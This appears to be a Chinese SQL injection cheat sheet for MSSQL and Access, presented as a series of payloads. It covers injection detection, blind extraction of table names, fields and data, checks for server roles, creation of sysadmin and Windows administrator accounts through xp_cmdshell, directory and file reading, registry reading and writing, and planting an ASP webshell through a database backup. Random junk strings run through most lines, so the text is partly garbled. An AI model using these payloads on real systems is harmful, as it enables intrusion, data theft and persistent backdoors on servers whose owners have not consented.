1.判断是否有注入;and 1=1 ;and 1=2 s;Q!X ?Q
2.初步判断是否是mssql ;and user>0 }o`76rDN
?6WY:Zec@
3.注入参数是字符'and [查询条件] and ''=' 1=V-V<
3a'<*v<xw
4.搜索时没过滤参数的'and [查询条件] and '%25'=' MQ6KN(?\ZL
SwMc
pNo
5.判断数据库系统 XwaXdvmK
q(84+{>B
;and (select count(*) from sysobjects)>0 mssql fNFY$:4X
&%J08l6
;and (select count(*) from msysobjects)>0 access X'iWJ8
S"H2 7
.?$gpM?i
4.t-i5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 %EB/b
Ysv"
6b}
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
ew4U)2J+
Gk6iIK
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >z@0.pN]7
jse&DQ
9.(1)猜字段的ascii值(access) S)@j6(HC4
sXFZWj}\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |yPu!pfl
I; rGD^
(2)猜字段的ascii值(mssql) Cp0=k
WH^%:4
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 nU7[c| =
EADqC>
10.测试权限结构(mssql) w``U=sfmV
{)sdiE
_H@DLhH|=
.7X^YKR
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- j0q&&9/Jj
X^j fuA
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- cw
<l{A
f3y=Wxk[
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- AA>P`C$&M
1?l1:}^L
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- [Y `W
)vlhN2iv
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- G 01ON0
,eS)e+yzc2
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =7UsVn#o
Tw<q,O
;and 1=(select IS_MEMBER('db_owner'));-- xskz)kk
I7]8Y=xf
o)/ 0a
Tp2.VIoQ=
11.添加mssql和系统的帐户 #KvlYZ+1
#AY&BWS$
;exec master.dbo.sp_addlogin username;-- }x,S%M-
;exec master.dbo.sp_password null,username,password;-- Dw"\/p:-3
c &c@M$
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *0ro0Z|Iq
yB!dp;gM{
;exec master.dbo.xp_cmdshell 'net user username password [nh>vqum
(cO:`W6.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 3OB"#Ap8<
rvM {M/4
;exec master.dbo.xp_cmdshell 'net user username password /add';-- yf,z$CR
-nwypu
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 8 zb/xP>
N$tGQ@
;9#KeA _
1\.pMHv/
12.(1)遍历目录 vih9KBT
Dt1jW
;create table dirs(paths varchar(100), id int) 7}mFL*
/mZE/>&~,
;insert dirs exec master.dbo.xp_dirtree 'c:\' w!XD/jN
St^5Byd<
;and (select top 1 paths from dirs)>0 |':{lH6+1
Y4YJJYvD
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n&!-9:0
}QmqoCAE~m
(h
`V+
!n%j)`0M
(2)遍历目录 nr3==21Om4
z@j8lv2j1
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- H,NF;QPPC
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 rT>wg1:
Alq(QDs
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 qxj(p o
jb)ZLA;L_c
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 *NQ/UXE
V.2_i*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 e}W)LPR!
phz&zlD
FGkVqZ Y2?
|l!aB(NW
13.mssql中的存储过程 7[wPn`v2
yDh6KUK
xp_regenumvalues 注册表根键, 子键 D/' dTrR
+H2Qk4XFB
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 4Po_-4
C9;kpqNG#u
xp_regread 根键,子键,键值名 c*M}N?|6
," ql5Q4
;exec xp_regread "Rl}VeDY
Q59W#e)
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值 D&zle~" J
F:ELPs4"
xp_regwrite 根键,子键, 值名, 值类型, 值 &c #N)U
T]$U""
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 #A.@i+Zv
:gC#hmm^
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 BJ0?kX@
'B}qZCy W
xp_regdeletevalue 根键,子键,值名 048kPXm`
XX~,>Q}H=
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 M^I(OuRMeI
hv+zGID7
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;wD)hNLAvR
%XTI-B/K
2T`!v
yLcEX
14.mssql的backup创建webshell rM"l@3hP
OrG).^l
use model [S<";l8
i6N',&jFU
create table cmd(str image); S
tyfB
.|=\z9_7S8
insert into cmd(str) values (''); E} .^kc[(4
jh$='G n
backup database model to disk='c:\l.asp'; et+0FF
,
w#J2 wS
A)KZa"EX
|K~Nw&rZ]
15.mssql内置函数 ]%(2hY~i
y> (w\K9W
;and (select @@version)>0 获得Windows的版本号 xLn%hxm?,
H[|~/0?K
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d!{r v
q'11^V!0
;and (select user_name())>0 爆当前系统的连接用户 B1Oq!k
|'2d_vR
;and (select db_name())>0 得到当前连接的数据库 =Runf
+}
LHmZxi?
<6=c,y
C.QO#b
16.简洁的webshell ~;] d"'
mcok/,/
use model "ITIhnE
lRdChoL$2
create table cmd(str image); 6zn5UW#q
D#z:()VT(
insert into cmd(str) values (''); ze;KhUPRm
-{_PuJ "
backup database model to disk='g:\wwwtest\l.asp';